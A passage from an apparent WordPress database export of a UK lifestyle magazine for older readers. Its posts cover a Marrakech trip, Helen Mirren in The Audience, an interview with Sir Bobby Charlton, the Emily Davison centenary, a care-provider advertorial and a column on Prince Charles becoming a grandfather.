Riads, which are traditional Moroccan homes that have been transformed into guesthouses, are scattered throughout the city and are a more authentic alternative to staying in a large hotel.</p>&#13;\n<p>Out on the busy streets, we spent our first morning in the heart of the red city at the magnificent Jardin Majorelle. Designed in 1923 by French painter Jacques Majorelle and restored by French fashion designer Yves Saint Laurent in the early 1960s, Jardin Majorelle is a mesmerising 12 acres of exotic plants, well-groomed pathways and bright blue and yellow coloured buildings.</p>&#13;\n<p>After an afternoon of walking around, we stopped for tea in the garden’s gorgeous café and had a delightful conversation with a retired English couple whose trip revolved entirely around retracing Winston Churchill’s steps within the country.</p>&#13;\n<p>They gave us the idea to go for dinner at what is famously known as Churchill’s favourite Moroccan hangout, the lavishly renovated art deco hotel La Mamounia.</p>&#13;\n<p>We took their suggestion, and spent thenight feasting on delicious platters of local delicacies including lamb tagine and vegetable couscous, while listening to live Moroccan music at the poolside restaurant, Le Marocain. We ended our night with a drink at the 1930s-style bar, La Bar Churchill, named after the famous patron himself.</p>&#13;\n<p>The following morning we mustered our courage to wade through the chaos of Djemaa el Fna, the bustling market, or “souk,” situated on the main square of the Medina. Not only is Djemaa el Fna the largest market in Morocco, but it is also considered one of the busiest market squares in the world. Here, bargain-hunters make their way through street performers, snake charmers, storytellers and belly dancers to stalls of livestock, spices, and exotic handmade goods.</p>&#13;\n<p>After a long day of haggling, we were thankful that Marrakech has plenty of hammams – traditional Morrocan spas – on offer. We headed to Les Palais Rhoul Hammam for an afternoon of (what we thought would be) pampering. I opted for the gommage rhassoul treatment, which turned out to be a rather vigorous scrub-down and wash in orange flower water. It wasn’t quite the soothing bath I’d had in mind, so I was thankful for the much less aggressive massage that followed.</p>&#13;\n<p>And with that, our trip was over. But as we left this sunny and exotic city, we began making our must-see list for next time.</p>&#13;\n									</div>','The marvel of Marrakech','Nina Reschovsky discovers the quaint post-colonial charm of the North African city.   “What does Morocco mean to an Englishman?” asked George Orwell in','publish','open','open','','the-marvel-of-marrakech','','','2018-04-02 20:03:53','2018-04-02 20:03:53','',0,'http://westonspirit.org.uk/the-marvel-of-marrakech.asp',0,'post','',0),(266,1,'2018-03-19 06:24:29','2018-03-19 06:24:29','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">18 March 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Why Her Majesty should invite Mirren to perform at Windsor\" st_url=\"http://westonspirit.org.uk/2013/03/why-her-majesty-should-invite-mirren-to-perform-at-windsor/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Why Her Majesty should invite Mirren to perform at Windsor\" st_url=\"http://westonspirit.org.uk/2013/03/why-her-majesty-should-invite-mirren-to-perform-at-windsor/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Why Her Majesty should invite Mirren to perform at Windsor\" st_url=\"http://westonspirit.org.uk/2013/03/why-her-majesty-should-invite-mirren-to-perform-at-windsor/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Why Her Majesty should invite Mirren to perform at Windsor\" st_url=\"http://westonspirit.org.uk/2013/03/why-her-majesty-should-invite-mirren-to-perform-at-windsor/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Why Her Majesty should invite Mirren to perform at Windsor\" st_url=\"http://westonspirit.org.uk/2013/03/why-her-majesty-should-invite-mirren-to-perform-at-windsor/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3 style=\"text-align: center;\"><img class=\"alignnone size-medium wp-image-3237\" title=\"THE AUDIENCE by Peter Morgan\" src=\"/wp-content/uploads/2013/03/Rough-300x369.jpg\" alt=\"\" width=\"300\" height=\"369\" srcset=\"../../../wp-content/uploads/2013/03/Rough-300x369.jpg 300w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></h3>&#13;\n<h3 style=\"text-align: center;\">Theatreland: Roderick Gilchrist</h3>&#13;\n<p> </p>&#13;\n<p>Helen Mirren is no monarchist. Indeed she was in her revolutionary youth an avowed republican. Now she says she favours a slimmed down royal family while recognising the job the Queen has done for the nation.</p>&#13;\n<p>But I wonder if Her Majesty privately returns the compliment.</p>&#13;\n<p>It would be instructive to know just how Elizabeth II responded to Mirren’s portrayal of her in The Queen, a film which, I suspect, gave the British nation a deeper understanding of the public and private pressures on Her Majesty.</p>&#13;\n<p>Now Mirren has advanced her intuitive take on the monarch to new levels of sympathy and understanding as she plays the Queen in The Audience, an imaginative new play by Peter Morgan, also the author of the film which did so much to advance Mirren’s reputation and, as I say, the Queen’s.</p>&#13;\n<p>The play reconstructs the private weekly encounters between Elizabeth and her prime ministers over the 60 years of her reign. All PMs from Churchill to Cameron have a cameo with the exception of Heath, Douglas- Home and Blair – who figured so extensively in the film The Queen that Morgan felt he should leave him out.</p>&#13;\n<p>Mirren’s reviews have been ecstatic. Morgan also gives her some of the best lines of her career. Mirren as the Queen reminds <br /> us she doesn’t have any O levels and that she is not just a wife and mother but also a symbol – “a postage stamp with a pulse,” as she drily observes.</p>&#13;\n<p>For those of us attracted to grown-up drama, written with great perception, acted with almost uncanny understanding of the characters portrayed and staged with monumental set designs that convince us we are actually in Buckingham Palace eavesdropping on these weekly conversations, it is theatrical cat nip.</p>&#13;\n<p>I’ve lost count of the number of times the last rites have been said over the West End theatre since I first sat in the blush red velvet stalls back in the 60s.</p>&#13;\n<p>The richness and variety of the West End remains the envy of Broadway and the delight of tourists across the world. From War Horse and the horrors of the First World War, to the comedy of One Man, Two Guvnors, from the intellectual stimulus of Rowan Atkinson’s Oxbridge professor in Quartermaine’s Terms to Harold Pinter’s moody Old Times, it is a feast that stimulates the senses and the brain.</p>&#13;\n<p>And what of musicals? Is the song and dance made about how they are choking new drama valid? The great value of shows like A Chorus Line or Mamma Mia is how they lift the spirits. And my God, don’t we need that in these austere times.</p>&#13;\n<p>There is another significant hidden benefit, too. Without fanfare Judy Craymer, producer of Mamma Mia, has channelled some of her profits into new theatre at the Donmar and other smaller stages, ensuring lesser-known writers and actors are given a chance to work and possibly become stars who will themselves ensure the future of theatre in Britain.</p>&#13;\n<p>I make no apology for my flag- waving for the British theatre. It is one of our great cultural heritages. And here there are parallels with the Queen, if that’s not too fanciful. Like her, to endure they have to change with the times.</p>&#13;\n<p>It is disappointing that the Queen never goes to the theatre, except when it’s her turn on the royal rota to attend the Royal Variety show which plainly brings her no pleasure.</p>&#13;\n<p>Stephen Daldry, director of The Audience, has offered to put the play on at Windsor Castle so the Queen might see it in private. She would be advised to take up his kind initiative. It took courage for Mirren to take on her role after so much success playing Her Majesty in the film. Some said she couldn’t possibly repeat that success and she would stain her reputation by doing so. She ignored them and has scaled even greater heights. I would urge the Queen to show the same kind of courage as Mirren and accept Daldry’s invitation.</p>&#13;\n<p>She might learn a great deal about herself that hadn’t occurred to her. She would undoubtedly learn a great deal about how her subjects perceive her. And she would be entertained royally. Now that wouldn’t be a wasted night.</p>&#13;\n									</div>','Why Her Majesty should invite Mirren to perform at Windsor','Theatreland: Roderick Gilchrist   Helen Mirren is no monarchist. Indeed she was in her revolutionary youth an avowed republican. Now she says she favours','publish','open','open','','why-her-majesty-should-invite-mirren-to-perform-at-windsor','','','2018-04-02 20:03:52','2018-04-02 20:03:52','',0,'http://westonspirit.org.uk/why-her-majesty-should-invite-mirren-to-perform-at-windsor.asp',0,'post','',0),(267,1,'2015-08-04 09:05:49','2015-08-04 09:05:49','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">18 March 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Why I have to make every second count\" st_url=\"http://westonspirit.org.uk/2013/03/why-i-have-to-make-every-second-count/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Why I have to make every second count\" st_url=\"http://westonspirit.org.uk/2013/03/why-i-have-to-make-every-second-count/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Why I have to make every second count\" st_url=\"http://westonspirit.org.uk/2013/03/why-i-have-to-make-every-second-count/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Why I have to make every second count\" st_url=\"http://westonspirit.org.uk/2013/03/why-i-have-to-make-every-second-count/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Why I have to make every second count\" st_url=\"http://westonspirit.org.uk/2013/03/why-i-have-to-make-every-second-count/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3 style=\"text-align: center;\"><img class=\"alignnone size-medium wp-image-3239\" title=\"Bobby Charlton And Michael Vaughan Attend Laureus Urban Stars Project Launch In Manchester\" src=\"/wp-content/uploads/2013/03/bobbyp4-300x423.jpg\" alt=\"\" width=\"300\" height=\"423\" srcset=\"../../../wp-content/uploads/2013/03/bobbyp4-300x423.jpg 300w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></h3>&#13;\n<h3 style=\"text-align: center;\">Football legend Sir Bobby Charlton speaks to Weston Spirit’s Alison Kervin about football, charity work and pitch invasions at the age of 75.</h3>&#13;\n<p> </p>&#13;\n<p>It was early evening and Sir Bobby Charlton was feeling a little ashamed. He folded himself into a large leather armchair and sighed. “Oh dear,�? he said, reaching across the hotel bar for a glass of something red enough and strong enough to ease his embarrassment – or at least to soften the sharp corners of his memory. “It’s just that I get this competitive urge. Sometimes I forget I’m an old man. I do some very silly things.�?</p>&#13;\n<p>The silly thing on this occasion was to run out onto a football pitch full of 10-year-olds in his best suit and new shoes, and join in. The World Cup winner had run around the pitch, shouting instructions to alarmed boys, before belting the ball into the back of the net. “Did you see those kids’ faces?�? he said. “Sheer horror and amazement. When am I going to grow up?�?</p>&#13;\n<p>Sir Bobby Charlton: 75-years-old, distinguished knight of the realm, footballing hero to millions, and fun-loving schoolboy at heart.</p>&#13;\n<p>“Perhaps no one really grows up,�? he contemplates. “We get older, sure, and less able, undoubtedly. But do any of us become less eager to enjoy life and have fun? I don’t think so. That’s one of the most misunderstood things about getting old. You’re still a boy deep down. You still want to make every second in life count for something.�?</p>&#13;\n<p>Charlton is regarded as one of the greatest footballers of all time – a goal-scoring phenomenon who notched up more goals for England (49) and Manchester United (249) than any other player. He won the World Cup with England in 1966 and captained United to European Cup glory in 1968, scoring two goals in the process.</p>&#13;\n<p>But there’s no doubt that the biggest impact on Charlton’s life came before footballing greatness, on a snowy February evening 55 years ago, when British European Airways Flight 609 crashed on the runway in Munich, with the Manchester United team on board. The crash took the lives of 23 people. Charlton knows he could easily have been one of them.</p>&#13;\n<p>“I remember that evening as if it happened yesterday,�? he says. “All the faces and the sounds…they’re still so clear in my memory. The years ease the pain a little, but not the memories. The whole thing was very hard for me to take for a long time, because Dennis [Viollet] and I swapped places with Tommy Taylor and David Pegg who decided they wanted to go to the back of the plane. We did it to help them. Tommy and David died. That’s hard. I was dragged from the plane by Harry Gregg. I have so many people to thank for the fact that I’m here today and have had a good life.</p>&#13;\n<p>“You go through something like that and you ask yourself – why did I survive? Why am I alive and so many of those young men are dead? In order to make sense of it all, I have to believe that we’re here for a purpose. And that purpose can’t be football. It needs to be more than that.�?</p>&#13;\n<p>Charlton has found purpose in his life – charity. “Helping those less fortunate,�? he says, is what drives him and motivates him.</p>&#13;\n<p>His current big campaign is to end the destruction caused by landmines. His passion for the subject was ignited after he visited football schools in Bosnia and northern Cambodia a few years ago and became horrified by what he found. He went to encourage children to play football, but discovered that three decades of war had left landmines littering the countryside.</p>&#13;\n<p>“I saw kids with limbs missing; I watched children try to dig up landmines in the ground with their fingers and old knives. It was horrific,�? he says. “It’s going to take them hundreds of years to remove the mines by hand like that. Hundreds of thousands more children are going to get hurt. I got on the plane home and I was crying. I just sat there thinking, ‘There must be something I can do, there must be something’.�?</p>&#13;\n<p>Charlton came home and decided to act, contacting bomb disposal experts and leading scientists from Manchester University, and urging them to work together to find a solution to the problem. He also contacted a friend at Rapiscan, the company which manufactures the metal detectors used at airports. “I thought they might be able to help, since metal detection is, basically, what we need to do,�? he says.</p>&#13;\n<p>Charlton has called his project There Must Be A Better Way, because: “There really must be a better way for these people to live their lives. Seeing youngsters without limbs is hard to take. There are almost half a million landmine survivors, but the fear is that the same number again will be maimed or killed if something’s not done to help.�?</p>&#13;\n<p>The landmines charity is one of many projects Charlton has thrown himself into with a vigour that belies his years. On that cold night in a hotel bar when he sipped his wine and lamented the way he’d run onto a football pitch filled with 10-year-olds, he was there to encourage socially disadvantaged children to try the sport. His life is devoted to that now – helping others, and taking the good that football can offer and presenting it to those in distress.</p>&#13;\n<p>“I want to feel I’m giving back. I like to think that being saved 55 years ago was worth it. I want to feel that I have some use, some purpose, that there’s some point to it all. Then I can relax and enjoy life, and I think that’s important – to be at peace with yourself,�? he says.</p>&#13;\n									</div>','Why I have to make every second count','Football legend Sir Bobby Charlton speaks to Get up and go\'s Alison Kervin about football, charity work and pitch invasions at the age of 75. � It was','publish','open','open','','why-i-have-to-make-every-second-count','','','2018-04-02 20:03:50','2018-04-02 20:03:50','',0,'http://westonspirit.org.uk/why-i-have-to-make-every-second-count.asp',0,'post','',0),(269,1,'2014-06-07 09:40:04','2014-06-07 09:40:04','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">20 May 2018</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\">&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"100 years on, why we should all remember Emily Davison\" st_url=\"http://westonspirit.org.uk/2013/05/100-years-on-why-we-should-all-remember-emily-davison/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"100 years on, why we should all remember Emily Davison\" st_url=\"http://westonspirit.org.uk/2013/05/100-years-on-why-we-should-all-remember-emily-davison/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"100 years on, why we should all remember Emily Davison\" st_url=\"http://westonspirit.org.uk/2013/05/100-years-on-why-we-should-all-remember-emily-davison/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"100 years on, why we should all remember Emily Davison\" st_url=\"http://westonspirit.org.uk/2013/05/100-years-on-why-we-should-all-remember-emily-davison/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"100 years on, why we should all remember Emily Davison\" st_url=\"http://westonspirit.org.uk/2013/05/100-years-on-why-we-should-all-remember-emily-davison/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3>Nina Reschovsky on the suffragette who died at Epsom Racecourse</h3>&#13;\n<div id=\"attachment_3290\" class=\"wp-caption alignleft\" style=\"width: 310px\"><a href=\"/\" rel=\"attachment wp-att-3290\"><img class=\"size-medium wp-image-3290 \" title=\"Emily Davison (1872-1913) English suffragette, throwing herself in front of George V\'s horse Anmer during 1913 Derby in attempt to gain recognition for suffragette cause. She died of her injuries.\" src=\"http://westonspirit.org.uk/wp-content/uploads/2013/05/Emily-Davidson-300x381.jpg\" alt=\"\" width=\"300\" height=\"381\" /></a><p class=\"wp-caption-text\">Emily Davison throws herself under King George V’s horse during the Derby</p></div>&#13;\n<p>The recent passing of Lady Thatcher reminds us just how far women have come in the past century. Although she divided opinion, we will always remember the late prime minister as a powerful woman who wasn’t afraid to stand up for her beliefs.  </p>&#13;\n<p>But, like many great women, Mrs Thatcher would never have risen to such heights without the efforts of the countless women before her who gave their lives to the fight for women’s rights. In some cases, literally. </p>&#13;\n<p>On June 4, 1913, ardent suffragette Emily Wilding Davison stepped out in front of King George V’s racehorse, Anmer, during the Epsom Derby. Thrown violently to the ground upon impact, she never regained consciousness and died four days later. </p>&#13;\n<p>Next month marks the hundred-year anniversary of Davison’s death. Sacrificing herself to the suffragette slogan, “Deeds not words” in protest against Parliament’s refusal to grant voting rights to women, Davison remains a feminist icon, viewed by many as a martyr for women’s rights. </p>&#13;\n<p>“She is far and away the most memorable suffragette,” says Dr Diane Atkinson, women’s activist and author of The Suffragettes. </p>&#13;\n<p>“Anybody who reads her story and about the frustrations she expressed in such a dramatic way is sort of pulled up short. First of all in realising how ludicrous it was that women didn’t have the vote, but also in how incredible it was that she was prepared to give her life for it. She had a long and extraordinary career, and she continues to be very important.”</p>&#13;\n<p>Davison, right, an Oxford graduate from Blackheath, London, was a militant agitator for women’s rights. On nine different occasions throughout her lifetime, she was arrested and sent to prison. Several times while in prison, she went on a hunger strike and was force-fed. On one such occasion, she hurled herself down a flight of iron stairs in protest. </p>&#13;\n<p>In commemoration of the centennial of her death, the Emily Wilding Davison memorial campaign has called for this year’s Epsom Derby to observe a minute’s silence in tribute to Davison. Supporters of the campaign, which was set up last November, include a variety of public figures such as women’s activist Dr Helen Pankhurst, the great-granddaughter of suffragette leader Emmeline Pankhurst. </p>&#13;\n<p><a href=\"/\" rel=\"attachment wp-att-3293\"><img class=\"alignleft size-medium wp-image-3293\" src=\"http://westonspirit.org.uk/wp-content/uploads/2013/05/Emily_Davison2-300x390.jpg\" alt=\"\" width=\"300\" height=\"390\" /></a></p>&#13;\n<p>Peter Barratt, a supporter of the campaign and the great-grandson of Leicester suffragette Alice Hawkins, says: “The moment of silence would serve primarily to commemorate Emily’s tragic death in the course of women’s rights a hundred years ago but, for me, it would also serve to commemorate the severe hardships that many women like Emily, and like my great-grandmother, suffered during that time.” </p>&#13;\n<p>This year’s 100th anniversary is being widely recognised. Last April, at a private gathering of almost 70 of Davison’s extended relatives, a plaque honouring her courageous actions was unveiled at Tattenham Corner at Epsom Racecourse.</p>&#13;\n<p>The following day, Philippa Bilton, a distant cousin of Davison’s, posted to her Twitter account: “Emily Wilding Davison plaque @ Epsom yesterday. Just amazing to be part of the next historical chapter. What a year! Roll on Derby Day…”</p>&#13;\n<p>It’s clear that Davison is gone but not forgotten and, in honour of the mark she left on women’s rights in Britain, many are eager to keep her memory alive. </p>&#13;\n<p>Indeed, last year during the opening ceremony of the London Olympics, she was honoured when, amid the depiction of monumental events in British history, there was a tribute to the suffragettes’ struggles, and the key moment in Davison’s crusade to win voting rights.</p>&#13;\n									</div>','100 years on, why we should all remember Emily Davison','Nina Reschovsky on the suffragette who died at Epsom Racecourse Emily Davison throws herself under King George V’s horse during the Derby The recent','publish','open','open','','100-years-on-why-we-should-all-remember-emily-davison','','','2018-04-02 20:03:48','2018-04-02 20:03:48','',0,'http://westonspirit.org.uk/100-years-on-why-we-should-all-remember-emily-davison.asp',0,'post','',0),(270,1,'2016-12-27 20:14:57','2016-12-27 20:14:57','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">19 May 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Bringing quality to later life\" st_url=\"http://westonspirit.org.uk/2013/05/bringing-quality-to-later-life/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Bringing quality to later life\" st_url=\"http://westonspirit.org.uk/2013/05/bringing-quality-to-later-life/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Bringing quality to later life\" st_url=\"http://westonspirit.org.uk/2013/05/bringing-quality-to-later-life/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Bringing quality to later life\" st_url=\"http://westonspirit.org.uk/2013/05/bringing-quality-to-later-life/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Bringing quality to later life\" st_url=\"http://westonspirit.org.uk/2013/05/bringing-quality-to-later-life/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h3 style=\"text-align: center;\">Award-winning care providers focus on choice and fulfilment.</h3>&#13;\n<p><a href=\"/2013/05/bringing-quality-to-later-life/mha\" rel=\"attachment wp-att-3183\"><img class=\"aligncenter size-full wp-image-3183\" title=\"MHA\" src=\"/wp-content/uploads/2013/03/MHA.jpg\" alt=\"\" width=\"596\" height=\"896\" srcset=\"../../../wp-content/uploads/2013/03/MHA.jpg 596w\" sizes=\"(max-width: 596px) 100vw, 596px\" /></a></p>&#13;\n<p>Quality, choice and fulfilment. These are the things we all want to preserve as we get older. At MHA, we have 70 years’ experience in supporting and caring for older people and are one of Britain’s largest charitable care providers, serving 16,000 older people nationwide.</p>&#13;\n<p>We see each one as an individual. They may be someone living in their own home craving company and friendship, a person wanting a little assistance with day to day tasks, or somebody very vulnerable, perhaps with dementia or nursing care needs.</p>&#13;\n<p>From the physically independent and able to the frailest, we offer a continuum of care to support older people physically, mentally and spiritually – however their circumstances may change.</p>&#13;\n<p>Our local Live at Home schemes, described by some as “lifelines”, bring friendship, social opportunities and practical support to people who live in the community.</p>&#13;\n<p>Helping the vulnerable</p>&#13;\n<p>Retirement Living residents enjoy the privacy and comfort of their own attractive apartments, with the reassurance of assistance available day and night, plus the option of tailored care and support to meet the needs of the most vulnerable, in many places.</p>&#13;\n<p>In addition, our care homes provide residential, nursing or specialist dementia care, often with music therapy or reflexology for people living with dementia to offer non-verbal channels of communication and expression.</p>&#13;\n<p>With options to buy, rent or part-purchase, you can make the best choice to suit your circumstances.</p>&#13;\n<p>Furthermore, all our residential areas are served by designated chaplains, offering spiritual support to people of any faith, or none.</p>&#13;\n<p>Perhaps this is why MHA was named Best Residential Care Provider in the Laing &amp; Buisson Independent Healthcare Awards 2017 – because we believe in quality, choice and fulfilment for all older people, in body, mind and spirit.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<div>&#13;\n<p>01332 296 200<br /><a href=\"http://www.mha.org.uk/\" target=\"_blank\">www.mha.org.uk</a></p>&#13;\n</div>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Bringing quality to later life','Award-winning care providers focus on choice and fulfilment. Quality, choice and fulfilment. These are the things we all want to preserve as we get older. At','publish','open','open','','bringing-quality-to-later-life','','','2018-04-02 20:03:47','2018-04-02 20:03:47','',0,'http://westonspirit.org.uk/bringing-quality-to-later-life.asp',0,'post','',0),(271,1,'2014-03-21 05:19:46','2014-03-21 05:19:46','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">19 May 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get up &amp; go – May issue\" st_url=\"http://westonspirit.org.uk/2013/05/get-up-go-may-issue/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get up &amp; go – May issue\" st_url=\"http://westonspirit.org.uk/2013/05/get-up-go-may-issue/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get up &amp; go – May issue\" st_url=\"http://westonspirit.org.uk/2013/05/get-up-go-may-issue/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get up &amp; go – May issue\" st_url=\"http://westonspirit.org.uk/2013/05/get-up-go-may-issue/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get up &amp; go – May issue\" st_url=\"http://westonspirit.org.uk/2013/05/get-up-go-may-issue/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>In this issue of <em>Weston Spirit</em> we ask Victoria Wood how she feels about turning 60 and we take a look back at the Dambusters’ raid of 1942. Roderick Gilchrist gives us a peak into Kim Cattrall’s new play, <em>Sweet Bird of Youth</em>, at The Old Vic next month.</p>&#13;\n<p>PLUS Peter kervin, Monica Porter and Peter Corrigan</p>&#13;\n<p></p><div><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=130517152123-0d8a59ff1405407ebfd5dad55084bc46&amp;docName=guag10&amp;username=lyonsdown&amp;loadingInfoText=GUAG%2010&amp;showFlipBtn=true&amp;backgroundColor=FFFFFF&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=130517152123-0d8a59ff1405407ebfd5dad55084bc46&amp;docName=guag10&amp;username=lyonsdown&amp;loadingInfoText=GUAG%2010&amp;showFlipBtn=true&amp;backgroundColor=FFFFFF&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object><div style=\"width:610px;text-align:left;\"><a href=\"/lyonsdown/docs/guag10_mode_embed_amp_backgroundColor_FFFFFF_amp_layout_http_3A_2F_2Fskin.issuu.com_2Fv_2Fcolor_2Flayout.xml\" target=\"_blank\">Open publication</a> - Free <a href=\"http://issuu.com/\" target=\"_blank\">publishing</a> - <a href=\"http://issuu.com/search?q=lifestyle\" target=\"_blank\">More lifestyle</a></div></div>&#13;\n<p><a href=\"http://www.ewartshaw.co.uk/financepublications/2013/GUAG_10.pdf\" target=\"_blank\">Download PDF</a></p>&#13;\n									</div>','Get up &amp; go – May issue','In this issue of Get up & go we ask Victoria Wood how she feels about turning 60 and we take a look back at the Dambusters\' raid of 1942. Roderick Gilchrist','publish','open','open','','get-up-go-may-issue','','','2018-04-02 20:03:45','2018-04-02 20:03:45','',0,'http://westonspirit.org.uk/get-up-go-may-issue.asp',0,'post','',0),(272,1,'2017-09-04 07:49:45','2017-09-04 07:49:45','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">19 May 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"How I see it… Monica Porter\" st_url=\"http://westonspirit.org.uk/2013/05/how-i-see-it-monica-porter/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"How I see it… Monica Porter\" st_url=\"http://westonspirit.org.uk/2013/05/how-i-see-it-monica-porter/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"How I see it… Monica Porter\" st_url=\"http://westonspirit.org.uk/2013/05/how-i-see-it-monica-porter/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"How I see it… Monica Porter\" st_url=\"http://westonspirit.org.uk/2013/05/how-i-see-it-monica-porter/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"How I see it… Monica Porter\" st_url=\"http://westonspirit.org.uk/2013/05/how-i-see-it-monica-porter/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3>I could teach you a thing or two about becoming a grandparent, Charles</h3>&#13;\n<p><a href=\"/\" rel=\"attachment wp-att-3298\"><img class=\"alignleft size-medium wp-image-3298\" title=\"Monica Porter journalist\" src=\"/wp-content/uploads/2013/05/Monica-Porter-journalist-300x375.jpg\" alt=\"\" width=\"300\" height=\"375\" /></a></p>&#13;\n<p>Back in the Seventies when Prince Charles and I were young, I fancied him and sometimes imagined myself canoodling with him. I was delighted when, as a novice journalist – staff writer on the venerable Local Government Chronicle, no less – I once went along to a press conference he gave. Something to do with architecture, I think.</p>&#13;\n<p>During the Q&amp;A, amid all the sober questions, one cocky hack asked the Prince of Wales where he’d got his tie. An uneasy hush fell upon the room. What impudence. But, after a surprised pause, Charles looked mildly pleased and said: “Do you like it? It was a present.” The point being that the tie’s motif was a play on words: it had little pictures of whales on it. </p>&#13;\n<p>Now I was really smitten. I mustered up my courage to ask HRH a question and, after answering it, he smiled and gave me a wink. As you can see, it was a moment I never forgot. I’m sure he remembers, too. Yes, Your Royal Highness, I was that starry-eyed cub reporter sitting in the front. Hello again!</p>&#13;\n<p>The Prince’s life and mine have taken some parallel turns over the past four decades, although my turns came first. I got married first, then was first to have two sons. I also got divorced before he did, and the pain, sadness and guilt involved in that ordeal can’t have been so different for him and me. Beneath the pomp, a royal is just another human being.</p>&#13;\n<p>Now HRH is about to become a grandparent and yup, I beat him to that, too. Twice. They’re called Dylan and Isaac, aged six and three. So I can fill him in on what to expect from this next stage of life. Oh, I know that Mrs HRH, Camilla, has a few grandkids already, but acquiring them by marriage isn’t like having your own. So for what it’s worth, here are some thoughts I’d like to share with my erstwhile pin-up.</p>&#13;\n<p>For a happy relationship with your grandchildren, you should, as far as possible, throw all that formal, “correct” stuff out the window. This is all about unstinting love.Imparting wisdom is good, but better by far that one day they should remember you for your warmth rather than your words. </p>&#13;\n<p>Money is clearly no object and you’ll be tempted to lavish luxuries on the little darlings, but lavishing time on them is much more rewarding. Memories of moments together will outlive the most extravagant present. </p>&#13;\n<p>Parenting is fraught with problems and pitfalls. But thankfully grand-parenting is a simpler gig. Rule of thumb: when in doubt just give them a cuddle. Tell them a story, or a joke. A little nature walk a deux can be bonding, too. So take them for a stroll around the garden (or, as you call it, Gloucestershire).</p>&#13;\n<p>Sir, I know you’ll make a fine granddad. Because you’ve learnt a lot about life, you’ve been around the block. Although I got around the block first.</p>&#13;\n									</div>','How I see it… Monica Porter','I could teach you a thing or two about becoming a grandparent, Charles Back in the Seventies when Prince Charles and I were young, I fancied him 